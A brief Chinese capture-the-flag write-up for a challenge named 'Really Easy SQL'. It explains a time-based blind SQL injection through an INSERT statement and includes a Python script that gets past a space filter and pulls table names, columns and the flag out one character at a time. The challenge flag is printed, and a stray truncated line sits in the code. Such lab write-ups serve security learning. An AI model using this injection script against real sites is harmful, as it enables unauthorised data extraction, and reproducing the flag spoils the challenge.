insert语句的sql注入

Really Easy SQL

提示钓鱼网站，猜测为insert注入，后端语句构造应该类似如下

1	insert into user values('$username','$password');

可以时间盲注

1	insert into user values('1','1'),(if(2>1,benchmark(2000000,md5(1)),2),'2');

过滤了空格，substr，sleep，写个exp

import requests
import time

url = 'http://a2ebcc4b-dd75-421d-be99-9bbd79fea09f.node4.buuoj.cn:81/'

def test():
    payload = f"ascii(mid(database(),1,1))>1"
    mydata = {'username': '1', 'password': f"1'),(if({payload},benchmark(2000000,md5(1)),2),'2"}
    start_time = time.time()
    r = requests.post(url, data=mydata)
    if time.time() - start_time > 1.5:
        print('yes')
    else:
        print('no')


def inj(s):
    for i in range(len(s) + 1, 60):
        for j in range(32, 127):
            # payload = f"ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=0x{database.encode().hex()}),{i},1))={j}"
            # payload = f"ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x{'flaggg'.encode().hex()}),{i},1))={j}"
            payload = f"ascii(mid((select group_concat(cmd) from flaggg),{i},1))={j}"
            payload = payload.replace(' ', '\n')
            mydata = {'username': '1', 'password': f"1'),(if({payload},benchmark(2000000,md5(1)),2),'2"}
            start_time = time.time()
            r = requests.post(url, data=mydata)
            if time.time() - start_time > 1.5:
                # print('yes')
                s += chr(j)
                print(s)
                break
            # else:
            # print('no')
            # print(c)


database = 'ctf'
version = '5.5.64MariaDB'
tables = 'flaggg,user'
columns='cmd'
flag='Dest0g3{a57b3d09-37b4-4761-b11f-cd7c67575661}'
Dest0g3{a57b3d09-37b4
inj(flag)
# while True:
#     test()